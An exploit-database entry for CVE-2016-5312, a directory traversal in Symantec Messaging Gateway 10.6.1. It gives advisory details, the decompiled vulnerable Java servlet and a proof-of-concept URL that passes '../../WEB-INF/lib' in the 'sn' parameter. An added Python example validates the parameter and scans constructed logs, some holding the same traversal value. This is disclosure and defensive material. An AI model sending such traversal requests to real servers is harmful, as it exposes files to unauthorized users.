Vendor: Symantec Messaging Gateway
Author: R-73eN
CVSS: 6.5 (MEDIUM)
CWE: CWE-22 (Directory Traversal)
Product Name: Symantec Messaging Gateway
Affected Version From: 10.6.1
Affected Version To: 10.6.1
Patch Exists: YES
Related CVE: CVE-2016-5312
CPE: a:symantec:symantec_messaging_gateway
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Year: 2016

Symantec Messaging Gateway <= 10.6.1 Directory Traversal

A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests. This could allow an authorized but less privileged user to reach paths outside the authorized directory, potentially giving read access to files or directories on the server that the user is not authorized to view. The problem lies in the package kavachart-kcServlet-5.3.2.jar, file com/ve/kavachart/servlet/ChartStream.java: the vulnerable code reads the 'sn' request parameter into a string and uses it without any sanitization for directory traversal sequences, which makes a directory traversal attack possible.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of Symantec Messaging Gateway.

Exploit-DB raw data:

# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Date : 28/09/2016
# Author : R-73eN
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
# Software : https://www.symantec.com/products/threat-protection/messaging-gateway
# Vendor : Symantec
# CVE : CVE-2016-5312
# Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00
# 
#  ___        __        ____                 _    _  
# |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    
#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    
#  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ 
# |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|
#
#
# DESCRIPTION:
#
# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests. 
# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory. 
# This could potentially provide read access to some files/directories on the server for which the user is not authorized.
#
The problem lies in the package kavachart-kcServlet-5.3.2.jar, file com/ve/kavachart/servlet/ChartStream.java
The vulnerable code is:
package com.ve.kavachart.servlet;

import java.io.IOException;
import javax.servlet.ServletOutputStream;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

// Decompiled excerpt; class header, imports and the closing braces were
// added so the fragment compiles. The labeled block is decompiler output.
public class ChartStream extends HttpServlet {
    public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {
        block6 : {
            try {
                String string = httpServletRequest.getParameter("sn");
                //**** Taking parameter "sn" and writing it to the "string variable"

                if (string == null) break block6;
                // Last three characters of the raw parameter become the image subtype
                String string2 = string.substring(string.length() - 3);

                byte[] arrby = (byte[])this.getServletContext().getAttribute(string);

                //**** The string variable is passed here without any sanitization for directory traversal
                //**** and you can successfully use this to do a directory traversal.

                if (arrby != null) {
                    httpServletResponse.setContentType("image/" + string2);
                    ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();
                    httpServletResponse.setContentLength(arrby.length);
                    servletOutputStream.write(arrby);
                    this.getServletContext().removeAttribute(string);
                    break block6;
                }
            } catch (IOException e) {
                // The posted excerpt ends before the original handler; a catch is
                // required for the try block to compile and is otherwise empty here.
            }
        }
    }
}


POC: 
https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib
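The check the 'sn' parameter lacks, written out as an added defensive illustration (this is not code from Symantec, from the KavaChart package or from the advisory author): a strict allowlist for a chart-handle value, a Content-Type derived from the validated extension rather than from the last three characters of raw input, and a scan over a few constructed access-log lines that flags ChartStream requests whose 'sn' would have failed the check. The handle format (hex id plus png/jpg/gif extension), the log layout, the client addresses and user names are assumptions made for the example; the only traversal value used is the page's own PoC parameter, once plain and once percent-encoded.

```python
"""Allowlist validation for a chart-handle parameter such as ChartStream's ``sn``,
plus a log check for requests that would have failed it.

Added example for this page, not code from Symantec or the KavaChart package.
The real servlet-context attribute naming is unknown; the handle shape
``<hex id>.<png|jpg|gif>`` is an assumption made for illustration.
"""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlparse

# Assumed handle shape: hex identifier, a dot, one of three image extensions.
HANDLE_RE = re.compile(r"^[0-9a-fA-F]{1,64}\.(png|jpg|gif)$")


def validate_chart_handle(sn):
    """Return the validated handle or raise ValueError naming the rule that fired.

    1. decode percent-encoding once (a double-encoded value keeps its '%' and
       fails the allowlist in step 3 instead of slipping through)
    2. reject any path separator, parent reference or NUL outright
    3. whatever remains must match the strict allowlist pattern
    """
    if sn is None:
        raise ValueError("missing sn")
    decoded = unquote(sn)
    if "/" in decoded or "\\" in decoded or "\x00" in decoded:
        raise ValueError("path separator or NUL in sn")
    # normpath collapses '.' and '..'; a plain basename survives it unchanged
    if posixpath.normpath(decoded) != decoded or decoded in (".", ".."):
        raise ValueError("relative path component in sn")
    if not HANDLE_RE.match(decoded):
        raise ValueError("sn does not match the chart-handle allowlist")
    return decoded


def is_valid_chart_handle(sn):
    """Boolean form of validate_chart_handle for callers that only need yes/no."""
    try:
        validate_chart_handle(sn)
        return True
    except ValueError:
        return False


def content_type_for(handle):
    """Derive Content-Type from the validated extension, not from the last
    three characters of untrusted input as the decompiled servlet does."""
    ext = handle.rsplit(".", 1)[1].lower()
    return "image/" + ("jpeg" if ext == "jpg" else ext)


# Constructed access-log lines (not captured from a real appliance); the
# traversal value is the one shown in the PoC, plain and percent-encoded.
SAMPLE_LOG = """\
10.0.0.5 - admin [28/Sep/2016:10:00:01 +0000] "GET /brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=3fa9c2.png HTTP/1.1" 200 4821
10.0.0.7 - report_user [28/Sep/2016:10:00:09 +0000] "GET /brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib HTTP/1.1" 200 0
10.0.0.7 - report_user [28/Sep/2016:10:00:12 +0000] "GET /brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=%2e%2e%2f%2e%2e%2fWEB-INF%2flib HTTP/1.1" 200 0
10.0.0.9 - admin [28/Sep/2016:10:01:00 +0000] "GET /brightmail/viewSummary.do HTTP/1.1" 200 1200
"""

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_chart_requests(log_text):
    """Return (line_no, sn, reason) for each ChartStream request whose sn fails
    validation; requests to other paths are ignored."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = REQ_RE.search(line)
        if not m:
            continue
        url = urlparse(m.group(1))
        if not url.path.endswith("ChartStream"):
            continue
        # parse_qs already percent-decodes, so the encoded variant is caught too
        sn = parse_qs(url.query).get("sn", [None])[0]
        try:
            validate_chart_handle(sn)
        except ValueError as exc:
            hits.append((line_no, sn, str(exc)))
    return hits


if __name__ == "__main__":
    for line_no, sn, reason in flag_chart_requests(SAMPLE_LOG):
        print(f"line {line_no}: sn={sn!r} rejected: {reason}")
```

The layered rejection reasons matter for operations: a separator or parent reference in 'sn' is a strong signal worth an alert on its own, while an allowlist mismatch alone may just be a malformed handle.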